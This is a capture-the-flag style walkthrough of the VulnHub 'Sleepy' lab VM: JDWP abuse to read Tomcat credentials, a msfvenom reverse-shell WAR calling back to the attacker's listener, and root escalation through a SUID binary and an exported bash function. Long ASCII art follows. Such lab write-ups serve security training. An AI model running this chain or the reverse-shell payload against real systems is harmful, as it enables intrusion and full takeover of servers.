/dev/random: Sleepy VulnHub Writeup
This is the second of two new challenges to hit VulnHub on 2015-10-02. This looks like it'll be a bit more of a challenge than Pipe. It is created by Sagi, and named Sleepy.
Service discovery
nmap -T4 -A -v 192.168.57.103
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-10-03 17:25 BST
NSE: Loaded 127 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.00s elapsed
Initiating NSE at 17:25
Completed NSE at 17:25, 0.00s elapsed
Initiating ARP Ping Scan at 17:25
Scanning 192.168.57.103 [1 port]
Completed ARP Ping Scan at 17:25, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:25
Completed Parallel DNS resolution of 1 host. at 17:25, 0.02s elapsed
Initiating SYN Stealth Scan at 17:25
Scanning 192.168.57.103 [1000 ports]
Discovered open port 21/tcp on 192.168.57.103
Discovered open port 9001/tcp on 192.168.57.103
Discovered open port 8009/tcp on 192.168.57.103
Completed SYN Stealth Scan at 17:26, 9.92s elapsed (1000 total ports)
Initiating Service scan at 17:26
Scanning 3 services on 192.168.57.103
Completed Service scan at 17:26, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.103
NSE: Script scanning 192.168.57.103.
Initiating NSE at 17:26
Completed NSE at 17:26, 30.75s elapsed
Initiating NSE at 17:26
Completed NSE at 17:26, 0.00s elapsed
Nmap scan report for 192.168.57.103
Host is up (0.00035s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
9001/tcp open jdwp Java Debug Wire Protocol (Reference Implementation) version 1.6 1.7.0_71
MAC Address: 08:00:27:79:0F:C3 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 0.004 days (since Sat Oct 3 17:21:22 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms 192.168.57.103
NSE: Script Post-scanning.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.00s elapsed
Initiating NSE at 17:26
Completed NSE at 17:26, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds
Raw packets sent: 3051 (136.868KB) | Rcvd: 28 (1.372KB)
So, we've got an FTP server that allows Anonymous login, what is likely a Tomcat instance, and a Java Debug Wire Protocol instance.
FTP Server
I FTP to the server, and perform some exploration. There's not much to see here.
ftp 192.168.57.103
Connected to 192.168.57.103.
220 ZzZZzZzz FTP
Name (192.168.57.103:test): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 16 Jan 15 2015 .
drwxr-xr-x 3 0 0 16 Jan 15 2015 ..
drwxrwxrwx 2 0 1002 23 Jun 19 00:03 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 1002 23 Jun 19 00:03 .
drwxr-xr-x 3 0 0 16 Jan 15 2015 ..
-rw-r--r-- 1 1002 1002 120456 Jun 18 21:40 sleepy.png
226 Directory send OK.
ftp> get sleepy.png
local: sleepy.png remote: sleepy.png
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for sleepy.png (120456 bytes).
226 Transfer complete.
120456 bytes received in 0.00 secs (23.9674 MB/s)
ftp> exit
221 Goodbye.
I downloaded the only file I could find - a PNG.
I couldn't find anything interesting in this file, so I move on.
Tomcat
I proceed by setting up Apache to connect to the Tomcat server, as detailed in this blog post. I check common login details for Tomcat, such as tomcat / tomcat, tomcat / s3cr3t, admin / admin etc, but with no success. I note that the version of Tomcat is pretty old, but no significant public exploits are present that can help me in this situation.
JDWP
We can connect to JDWP with jdb, without authentication. Awesome!
jdb -attach 192.168.57.103:9001
Picked up JAVA_TOOL_OPTIONS: -javaagent:/usr/share/java/jayatanaag.jar
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>
Once connected, I get a list of running threads, and then interrupt one of them, so that I can execute some arbitrary Java.
> threads
Group system:
(java.lang.ref.Reference$ReferenceHandler)0x19e Reference Handler cond. waiting
(java.lang.ref.Finalizer$FinalizerThread)0x19f Finalizer cond. waiting
(java.lang.Thread)0x1a0 Signal Dispatcher running
Group main:
(java.lang.Thread)0x1 main sleeping
> interrupt 0x1
>
Exception occurred: java.lang.InterruptedException (uncaught)"thread=main", java.lang.Thread.sleep(), line=-1 bci=-1
main[1]
After this, I can now execute some Java to tail line by line the file /etc/tomcat/tomcat-users.xml, until I reach the line containing a username and password that have access to the management GUI. I'm sure this isn't the most optimal way to do this step, as I'm sure I've put together a snippet to output a whole file in a single line of code in Java before (without loops), but I can't find that snippet in my notes right now, so this will have to do.
main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("tail -n 1 /etc/tomcat/tomcat-users.xml").getInputStream())).readLine())
new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("tail -n 1 /etc/tomcat/tomcat-users.xml").getInputStream())).readLine()) = "</tomcat-users>"
main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("tail -n 2 /etc/tomcat/tomcat-users.xml").getInputStream())).readLine())
new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("tail -n 2 /etc/tomcat/tomcat-users.xml").getInputStream())).readLine()) = ""
main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("tail -n 3 /etc/tomcat/tomcat-users.xml").getInputStream())).readLine())
new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("tail -n 3 /etc/tomcat/tomcat-users.xml").getInputStream())).readLine()) = ">user username="sl33py" password="Gu3SSmYStR0NgPa$sw0rD!" roles="tomcat,manager-gui,admin-gui,admin,manager-jmx,admin-script,manager,manager-script,manager-status"/>"
Tomcat - the authening
Now that we have manager credentials for Tomcat, we can drop a malicious WAR to gain further access to the server.
I use msfvenom to generate a payload, and then run msfconsole and start the handler.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.57.102 LPORT=8888 -f war > sleepy.war
Payload size: 1093 bytes
test@test-VirtualBox:~$ msfconsole
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
################## ####
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # ### # # ##
########################
## ## ## ##
http://metasploit.pro
=[ metasploit v4.11.4-dev-c4048cf1 ]
+ -- --=[ 1474 exploits - 849 auxiliary - 236 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.57.102
LHOST => 192.168.57.102
msf exploit(handler) > set LPORT 8888
LPORT => 8888
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.57.102:8888
[*] Starting the payload handler...
msf exploit(handler) >
I then login to Tomcat, upload the WAR and visit the deployed endpoint (in this case, '/sleepy'). This results in a shell being opened in msfconsole.
msf exploit(handler) > [*] Command shell session 1 opened (192.168.57.102:8888 -> 192.168.57.103:58772) at 2015-10-03 17:42:14 +0100
I attach to my session, and start digging.
msf exploit(handler) > back
msf > sessions -i 1
[*] Starting interaction with 1...
id
uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0
pwd
/usr/share/tomcat
After searching for files with their SUID or SGID bits set which are owned by the 'root' user, I find a file in /usr/bin named 'nightmare'
find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/mount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/nightmare
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib64/dbus-1/dbus-daemon-launch-helper
ls -alh /usr/bin/nightmare
ls -alh /usr/bin/nightmare
-rwsr-s---. 1 root tomcat 8.5K Jan 18 2015 /usr/bin/nightmare
Attempting to run the binary results in an error stating that no TTY is present.
/usr/bin/nightmare
[-] error: no tty present
Using the usual Python snippet, I get a PTY session and try running the binary again.
python -c 'import pty; pty.spawn("/bin/bash");'
bash-4.2$ /usr/bin/nightmare
/usr/bin/nightmare
Error opening terminal: unknown.
[+] Again [y/n]?
Ok, we're getting a different error now, but at least it's not terminating straight away.
I open up the binary in Hopper, and make some notes about the program flow.
Upon entering the 'main' method, it sets the action for a signals 0x2 (SIGINT) and 0xf (SIGTERM) to the address 0x40081f.
Next, it will attempt to open TTY, and if it succeeds it calls the 'fire' method, otherwise it exits stating that no TTY is present.
int main() {
memset(var_A0, 0x0, 0x98);
sigaction(0x2, 0x40081f, 0x0);
sigaction(0xf, 0x40081f, 0x0);
if (open("/dev/tty", 0x2) != 0xffffffff) {
fire();
rax = sub_4008d0();
}
else {
puts("[-] error: no tty present");
rax = 0x0;
}
return rax;
}
The 'fire' method calls system('/usr/bin/aafire'), and then returns.
void fire() {
system("/usr/bin/aafire");
return;
}
After returning from this binary, rax is set to the return value of the 'sub_4008d0' method, and then 'main' returns.
The method 'sub_4008d0' is a simple loop, that will do nothing but call the 'fire' method again if 'y' is chosen. The 'n' option doesn't do anything.
I move on to check out the address set for the SIGINT and SIGTERM signals.
All the signal handler does is call the method 'train', and then exit.
int sigHandler(int arg0) // noreturn {
train();
rax = exit(0x0);
return rax;
}
The 'train' method sets the UID and GID to 0, aka root. It then calls a binary at the path '/usr/bin/sl'.
int train() {
setresuid(0x0, 0x0, 0x0);
setresgid(0x0, 0x0, 0x0);
rax = system("/usr/bin/sl -al");
return rax;
}
Shit just got real. We somehow need to either exploit this binary, or ensure that our own code gets called in place of it.
Looking at the binary '/usr/bin/aafire', it seems to use the library ‘aalib’, an ASCII art library. aalib is failing to initialise, which would probably explain why we're getting the above error when running the 'nightmare' binary.
I didn’t have much luck looking for any way to exploit this binary, so I went Googling to see if we could execute our own code, instead of the target binary (similar to when a binary is called without a path).
I stumbled across this Server Fault post, that states if we define a function with the same name as the full path to a binary, our function will get called instead.
Last steps
So, with what we've learnt above, we should be able to trigger execution of arbitrary commands under the context of root. We do this by first of all using Python to spawn a '/bin/bash' with a PTY. We then create and export a function with the name '/usr/bin/sl', which calls '/bin/bash'. Next, we run '/usr/bin/nightmare', and then in another session send the SIGTERM signal to the process.
So, in the first session, I set and export our function, and run '/usr/bin/nightmare'..
python -c 'import pty; pty.spawn("/bin/bash");'
bash-4.2$ function /usr/bin/sl () { /bin/bash; }
function /usr/bin/sl () { /bin/bash; }
bash-4.2$ export -f /usr/bin/sl
export -f /usr/bin/sl
bash-4.2$ /usr/bin/nightmare
/usr/bin/nightmare
Error opening terminal: unknown.
[+] Again [y/n]?
Then in the second session send the SIGTERM signal to the process.
ps aux | grep nightmare
root 8976 0.0 0.0 4164 352 pts/3 S+ 15:08 0:00 /usr/bin/nightmare
kill -15 8976
Checking the first session, we've dropped back to bash, but not as the user we started with!
bash-4.2# id
id
uid=0(root) gid=0(root) groups=0(root),91(tomcat) context=system_u:system_r:tomcat_t:s0
Checking out the 'root' users home directory, we find a file named 'flag.txt'.
bash-4.2# ls /root
ls /root
flag.txt
bash-4.2# cat /root/flag.txt
cat /root/flag.txt
Well done!
Here's your flag: 3eb030c6ab099b0a355712fe38d59ffb
Ascii Art: Mark Van Hooren
(http://www.retrojunkie.com/asciiart/cartchar/snowwhit.htm)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Doc .;;;;.
<!!!!!!>;
;!!!!!!!!!!> .,;;,.
,!!!!!!!!!!!!!; ,;> ;;!!!!!!!!!>;
!!!!!!!!!!!!!!' ,;<!!!' ,<!!!'``.,,,. ``<;
<!!!!!!!!!!!!(.,;!',;;!!!!!! <!!!' ,c$$$$$$$c, `!
!!!!!!!!!!!!!!!!!;!!!!!!!!' ;!!! .r"',?$$$$$"., `!
!!!!!!!!!!!!!!!!!!!!!!!!!'.;!!' z$.J"..`$$$$c".. '
!!!!!!!!!!!!!!!!!!!!!!!!!<!!! .J$$P c$$$$$$$$c$$$..
<!!!!!!!!!!!!!!!!!!!!!!!!!!!'z$$$$h$$$$$$$$$$$???$h
!!!!!!!!!! !!!!!!!!!!!!!!! z$$$$$$$$$P `$$$F ,$$
`!!!!!!!! <!!!!!!!!!!!!!!'<$$$$$$$$$" c <$$P z ?$$
`!!!!!! ;!!!!!!!!!!!!!' .$$$$$$$$$F J$ <$$ J$F $$F
`!!!! !!!!!!!! !!' J$$$$$$$$$ ` J$$ ".?"" ..
`<!! .!!!!!!! >' ."<$$$$$P"" .. <$$$ " .r JF"
`! !!!!!! ' .n= ,,""?$" z$$$c, $P".,cccc, ".`?$$
<!!!' .xnP" z$$$$$cc J$$$$$$.==?$$$$$$$$ $h.
`'.nJMP",c$$$$$$$$$ ?$$$$$$ ,ccc$$$$$$$"???"..)Mbnx.
.-nMMMM" z$$$$$$P"" " "???" -$$$$$$$$$P" -c$$$ 4MMMMn.
uMMMMM <$$$$$$$J$$$c "?ccc$$c,"""""""" z$h$$$P JMMMMMC`
.MMMMMMM `$$$$$$$$$$$$h `??$$$$$cc,,r= .J$$$$$" .MMMMMMM
uMMMMMMMMx ?$$$$$$$$$"$$. . ""???"" /??$$??" .nMMMMMMMM
MMMMMMMMMM. "?$$$$$$$,`?$.`:: . ,-" -"" .xJMMMMMMMMMM
MP.MMMMMMMMb.. `"""""" ?$c `-`` ,-' .,.xnmMMMMMMMMMMMMP""
" )MMMMMMMMMMMMMMmnmMbn. "?hccc=' .JMMMMMMMMMMMMMMMMMMP
4MMMMMMMMMMMMMMMMMMMMMMn. .xJMMMMMMMMMMMMMMMMMMMP
`MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP
`4MM"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP"
`"- 4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP"
"44MMMMMMM"44MMMMPPC"4MMMMMMMMMMP
`"""= ""444444L
Happy
;<!!!!;>
.<!!!!!!!!;
;!!!!!!!!!!!;
<!!!!!!!!!!!!!>
'!!!!!!!!!!!!!!!>;
<!!!!!!!!!!!!!!!!!>. .,. ..;;;;;;;;..
!!!!!!!!!!!!!!!!!'',. ;<'' ;;!!''```,.```'!;
!!!!!!!!!!!!!!!!!;<!,;!' ;;!!'`.,cc$$$$$c= `''
`!!!!!!!!!!!!!!!!!!!!!' ;!!' -???"?$$$$F,bJmb '!
`!!!!!!!!!!!!!!!!!!!!' !!!' ,n4Mnxr`$$F PP"""4 '
<!!!'!!!!!!!!!!!!!! ;!!! `4MMPPPM $$c ,c$$$,. '
`!! !!!!!!!!!!!!!!' !!' J$ J"'.,.,,.$$$$$$$$$$$L
`',!!!!!!!!!!!!!! !!! J$$ J$$$$$$$$$$$??"?$$$$F
!!!!!!!!!!!!!!!<!! J$$$$$$$F ? $$$$$$F $$$$h
.!'!!!!!!!!!!!!!!! <$$$$$$$$ . ?$$$$P ch.?$$$$
' !!!!!!!!!!!''!> ?$$$$$$$F,$$$ "$$$F<$$$.$$$$
;!!!!!!!!!!' <! x $$$$$$$'J$$$, $$$,` `?,$$$$ -.
!!!!!!!!!!' !!' M $$$$$$$ " `"? $$$L `,c$$$L ' =nmn.
!!!!!!!!! ;!!'.JP $$P""""h $$$$= """?$$$$$$cc, "MM.
!!!!!!!! <!' x" c$$P".,.,,. J$$C zcd$$$$, $$$$$$$$$ MMMMn.
!!!!!' <' ,nP" J$$$cd$$$$$$$hr`""""$$$$$$$' ,c,$$$$$'MMMMMb
`!!! `.xn" ,c$$$$$$$$$$$$$$$P"<$$$$$$$$" ,-z$$$$$$$" MMMMMr
!' nJM" c$$$$$$$$??????"""",c `"""""' ,='c$$$$$$" .JMMMM4M
xnMMM <$$$$$$$$" ,. =cccd$$$$hcccccc"',$$$$$P" .nMMMMMM
,=)MMM>.$$$$$$$$'cd$$hc """????"""" z-$P"" ..nMMMMMMMP
,nMMMM.<$$$$$$$$$$$$$$$h. .. f ..xnmMMMMMMMMM)\
JMMMMMb "$$$$$$$$$$$$$$$$.`::.`:.. ; .nJMMMMMMMMMMMMM =
MMMMMMMMn ?$$$$$$$$$h,."?$L. `:::: ,J .MMMMMMMMMMMMMMP
,4MMMMMMMMbx. `"""""""""" `"?hc,..,rP".MMMMMMMMMMMMMP"
' )MMMMMMMMMMbnmnnmnmnmMMbnnx.. """" ..JMMMMMMMMM""P"
`MMMMMMMMMMMMMMMMMMMMMMMMMMMMbnmnmMMMMMMMMMMMP
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMPP"
"P"MMMMMMMMMMMMMMMMMMMMMMPPP4MMMMPPPP""
"4MMMPPMMMMMMMMMMMMMMMMx,.
""F J"44MMMMM""""""""
Bashful .,,;;;,,. '!!!!!!!!;;;.
.;<!!!!!!!!!!;.``<!!!!!!!!!;; `'>;;;;;;;;;,.
;!!''',,,,_```<!!; '!!!!!!!!!!!;.`!!!!!!!!!!!!;;,
;!' ,c$$$????$cc `<!!;`!!!!!!!!!!!!!!!!!!!!!!!!!!!!;;
,''-""$$$$.??cC$$$c '!!,`!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>.
,!,"-"'$$$F . `?$$$$h '!!.`<!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.
' P zcd$$$c<$$c,"$$$$h.'!!!!!!!!!!!!!!!!!!<!!!!!!!!!!!!!!!
c J$$$$$$$$$$$$c$$$$$h !!!!!!!!!!!!!!!!!>'!!`<!!!!!!!!!!!
<$c$$$$$$$$",c,"?$$$$$$ <!!!!<!!!!!!!!!!! <> !!!!!!!!!!!!
<$$P..`?$$C $"?h."$$$$$c .``<!.`'!!!!!!!!! ' ```<!!!!!!'
<$$ `$$."F? ` " `$$$$$c,"-,.` `'!!!!!> `''``
`Li "" ?c cc $$?$$$$cc,."-.. ''!!!
hJ . <$h`?$cc$F),J$$$$$$$$$c`4Mn. '!'
.`? ?c,,.$$$,`?",J$$$$$$$$$$$$$$c MMb.
,cc$$$cr=`,J$$$$P J$$$$$$$$$$$$$$$$$>`MMMr
<$$P"',ccd$$$$""" <$$$$$""'."?$$$$$$$$.MMMMx
..n> $P",J$$$$$$$F,cdhc."""". z$$$$$$$$$$$'JMMMMM
.nMMMb ` <$$$$$$$$$$$$$$$F cc$',$$$$$$$$$$" ,MMMMMM.
. ,MMMMMn. $$$$$$$$$$$$$$$$' $P',$$"C$$$P"" ,nMMMMMMM
,nMMMMMMMM.`$$$$$$$$$$$$$P' J",c$""="" .,xnMMMMMMMMP
uMP4MMMMMMMb,`?$$$$$$$$$P" `,c??'.,xnMMMMMMMMMMMMMMM'
,MP.JMMMMMMMMMbx.`"??"" ???" ,xJMMMMMMMMMMMMMMMMMM'
M";MMMMMMMMMMMMMMMbmmnmMMM+nnmMMMMMMMMMMMMMMMMMMMMP4P
n ;MMMMMMMMMMMMMMMMMMP"',nmMMMMMMMMMMMMMMMMMMMMMMMM P
f MMMMMMMMMMMMMMMP" ,xnMMMMMMMMMMMMMMMMMMMMMMMMMP
,MMMMMMMMMMMMMMP ,nMMMMMMMMMMMMMMMMMMMMMMMMMMP,P
4MMMMMMMMMMMMP',JMMMMMMMMMMMMMMMMMMMMMMMMMMP
4MMMMMMMMMMP ,MMMMMMMMMMMMMMMMMMMMMMMMMMMP"
"MMMMMMMMM JMMMMMMMMMMMMMMMMMMMMMMMMMP""
`MMMMMMM.JMMMMMMMMMMPMMMMMMMPPMMP""
`MMMMMMMMMMMMMMMP)nMMPPP" = "
4M"MMMMMMMMP",JP""
"- 4MMMMM",=
"MMP
Grumpy .,,,;;;;;,,.
,;;!!;;;.`'!!!!!!!!!!>;;,
;!!!'''!!!!!;.`!!!!!!!!!!!!!;,
;!!'. ==-.`'<!!!> `!!!!!!!!!!!!!!,
!',cF.`?c,$c,`<!!!;`<!!!!!!!!!!!!!!, `;;.
! z$$P `$$$c,`!!!! '!!!!!!!!!!!!!!!,`;!!;.
'..`$$ c$$c`?$$$.`<!!! `!!!!!!!!!!!!!!!!<!!!!>
"?$$F <$$$$$J$$$$c <!!! '!!!!!!!!!!!!!!!!!!!!!!;
?"F `""$$$$$$$$$.'!!!!;.)!!!!!!!!!!!!!!!!!!!!!>
J$.`F,L $c $$$$$$$$L `!!!!!!!!!!!!!!!!!!! !!!!!!!!>
$',-`?F`$$,`P"L$$$$$. <!!!!!!!!!!!!!!!!!! `!!!!!!!!>
" " `$$ ?" ,c$$$$$ `!!!!!!!'!!!!!!!!! `!!!!!!!!!>
,cccccc,. == $h,. ,z$$$$$$$$h. ''!!!!!;;.``<!!!! !!!!!!!!!>
c$$$$$$$$$$$h===?$$$$$$$$$$$$$$$$c`-.``<!!!!!; `!!! ,!!!!!!!!!!
$$$$$$$$$$$P",r",zcc .,.`"?$$$$$$$$c,"-=. ``!!!; !' !!!!!!!!!!!>
<$$$$$$$$$$$$$P,c$$$$$ $$$$$c,"?$$$$$$$$cc`-n. `'!; ;!';!!!!!!!!>
$$$$$$$$$$$$$$$$$$$$F $$$P""' "$$$$$$$$$$ `MMb. `> ,<!!!!!!!!!!
`$$$$$$$$$$$$$$$$$$" zP",c$$$$c,`$$$$$$$$$> MMMMF. !!!!!!!!!!!!!
?$$$$$$$$$$$$$P" =",c$$$$$$$$c$$$$$$$$$ ,MMMMn !!!!!!!!!!!!>
""???????"" .,,cd$$P" ,cd$$$$$$$$$$P'.MMMMMMb .!!!!!!!!!!!!>;
.,,x "?$$$P"" """???$$$$$P"" ,MMMMMMMM `!!!!!!!!!!!!>!>
uMMMMMx. .,nmMMMMbmn,,.,,,,nMMMMMMMMMM <!!!!!!!!!!!,!!>
;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM !!!!!!!!!!!!!!>
P4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM' `<!!!!!!!!!!!!!
JMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP `!!!!!!!!!!!'
;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP `'!!!!!!'`
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP
;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP P
4>4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM" '
JMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'
MMMMMMMMMMMMMMMMMMMMMMMMMMPMM"
;MMMMMMMMMMMMMMMMMMMMMMMMM",P
J4MMMMMMMMMMMMMMMMMMMMMM"
JMMMMMMMMMMMMMMMP"dMP"
MMMMMMMMMMMMMMP .="
4MMMMMMMMMMMP `
4MMMMMMMMMM"
MMMMMMMMP
`MPMMMMP
)MMM
4M'
"
Sleepy ,;;;;;;;;,.
.,;!!!!;;. `'!!!!!!!!!!>,
,;!'````'!!!!!!;> `!!!!!!!!!!!!;,
'` ,ccccc= ``<!!!!; ''!!!!!!!!!!!!,
' ""$$$$P`-- ``!!!!! `!!!!!!!!!!!!!>
,cr""$$$$" cr ?h`hr <!!!!;'!!!!!!!!!!!!!!>
,F ,c,.$$hc$$$h "$$$h <!!!; <!!!!!!!!!!!!!>
,P,c???$$$$PPPP?cc"$$$$c`<!!!! '!!!!!!!!!!!!!!
J$F ,c $$$F c$c "$$$$$$$, <!!!>;!!!!!!!!!!!!!!>
c$" J$$ $$$ c$$$$ $$$$$$$c`!!!!!!!!!!!!!!!!!!!!,
$F J$$$ $$F $$$$$h.`$$$$$$$.`!!(`'!!!!!''!!!!!!!!
$' ?" <$$F ""$ $$$$$$$h <!!! !!!!>; '!!!!!!
L .. <$$F<$$L $$$$$$$F `!!!!; `!!!!!; `!!!!!
? ??? =?$$$ ??$hc,. cd$$$$$F= `!!!!>. `<!!!; `<!!'
,cc$$$c, ?$,=,. J$$$$$$$F 4.`!!!!!>; '!!! !!
.J$$$$$$$$$$cc=c,"?$$$$PP$$$$$$c`b. <!!> -;. <! ;!
J$$$$$$$$$P",ccc,"c,,,,cd$$$$$$$c,`b `!!!> `'!! ;'
?$$$$$$$$$$$$$$$$, $$$$$$$$$$$$$$$.`b,`'!!!> <! '
`$$$$$$$$$$$$$$$" ,$$$$$$$$$$$$$$$$h `b.`'!!!, >
Jc "??$$$$$$$$P" c$L "?$$$$$$$$$$$$$h.`Mx.`<!!; ;>
. c$$$c """"""" ,c$$$P $$$$$$$$$$$$$$h 4MMr <!!! <!>
M> $$$$$c "ccccd$$$$$$$" <$c$$$$$$$$$$$$$$$h MMMr `!! `!>
nMM> $$$$$$hc`??$$$$$??" ,c$$$$F?$$$$$$$$$$$$F MMMP< !! ;!!
nMMMMr ?$$$$$$$=. `""",cc$$$$$P".$$$$$$$$$$$$" MMMr' ;<!!!
JMPJMMMx ??$$$$F ?$$$$$$$$$??. ????$$$$?? ,MMMMM '!!!!!!>
P'uMMMMMMx,,. ??????" .,MMb,. .uMMMMMM <!!!!!!!
' MMMMMMMMMMMMMMMMMmn,. ,nmMMMMMMMMmnmnmnmMMMMMMMMMr !!!!!!!!
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM> !!!!!!!!
JMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM !!!!!!!!
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM !!!!!!!>
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM> ,!!!!!!!
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM !!!!!!!'
MMMMPMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMPMM' ;!!!!!!!
4MMP MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MP .!!!!!!!
`MM MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM> ''!!!'
P MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP =
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP M"
`MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMP xP
4MMM MMMMMMMMMMMMMMMMMMMMMMMMMMMM
4MM 4MMMMMMMMMMMMMMMMMMMMMMMMM"
"M MMMMMMMMMMMMMMMMMMMMMMMMP
` MMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMPPMMP
`MMMMMMMMMMMMMMM ,M"
4MMMMMMMMMMMMMP,MP
"MMMMMMMMMMMM dF
`4MMMMMMMMMP P
`4MMMMMMMM>
"MMMMMMM>
"4MMMML
"4MMM>
`4MM
Sneezy ,;!!!!!;,
,<!!'`````'!;.
!!!' .zchccc,.``
!!! z$$$$$$$$$$$h
!!! <$$$$$$$$$$$$F cc
!!!'<$$$$$$$$C"??$$ ? ,' cc$cc
;>;!!! J$$$$$$$$$$hc,"h ,',$$$$$$$.
,<!>'!!! ?$$$$P"" ""??$h"hF J$$$$$$$L
;!!!>'!!! .$$$$ <$P z,,,c$F<$$$$$$$$F .
!!!!>'!!!> ?$$$c<$ ,""".?"$F`..z$$$$$' ?c,
!!!!!! !!!!.`$$$$P"".??",J F.J$$$$$$P' z.?$h.
;!!!!!!> !!!! ?$$$c zJhcdP"z `?$$$$P" .z$h $$$c . .,nmnmnx,.
;!!!!!!> !!!!. "?$$$$$,,,,c$ . """ .,JP""? <$$$.`MMMMMMMMMMMMMC(
!!!!!!!!!!!!!! `. ?$$$$$$$$$ ?$$$$$$$',db hJ$$$$ MMMMMMMMMMMMMMMbx
<!!!!!!!!!!!!!, M' ?$$$$$$$$,`$$$$$$F,MMP $$$$$F JMMMMMMMMMMMMMMMMM.
`!!!!!!!!!!!!!! Mb $$$$$$$$h ?$$$$$ "'.: ?$$$P MMMMMMMMMMMMMMMMMMM
